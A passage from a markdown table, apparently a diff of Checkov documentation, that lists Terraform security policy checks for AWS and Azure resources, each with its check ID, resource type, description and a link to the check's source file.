[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1112 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1113 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1114 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1115 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1116 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1117 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1118 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1119 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1120 | CKV2_AWS_37 | resource 
| aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1121 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1122 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1123 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1124 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1125 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1126 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1127 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1128 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1129 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1130 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1131 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1132 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1133 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1134 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1135 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1136 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1137 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1138 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1139 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1140 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1141 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1142 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1143 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1144 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1145 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1146 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) |
-| 1147 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) |
-| 1148 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1149 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1150 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1151 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1152 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1153 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1154 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) |
-| 1155 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) |
-| 1156 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) |
-| 1157 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
-| 1158 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
-| 1159 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
-| 1160 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
-| 1161 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) |
-| 1162 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
-| 1163 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
-| 1164 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) |
-| 1165 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) |
-| 1166 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) |
-| 1167 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1168 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1169 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1170 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
-| 1171 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
-| 1172 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) |
-| 1173 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) |
-| 1174 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) |
-| 1175 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1176 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1177 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1178 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1179 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1180 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1181 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1182 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) |
-| 1183 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) |
-| 1184 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
-| 1185 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
-| 1186 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) |
-| 1187 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) |
-| 1188 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) |
-| 1189 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) |
-| 1190 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) |
-| 1191 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) |
-| 1192 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) |
-| 1193 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
-| 1194 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
-| 1195 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) |
-| 1196 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) |
-| 1197 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) |
-| 1198 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) |
-| 1199 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) |
-| 1200 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) |
-| 1201 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) |
-| 1202 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
-| 1203 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
-| 1204 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
-| 1205 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
-| 1206 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1207 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1208 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1209 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
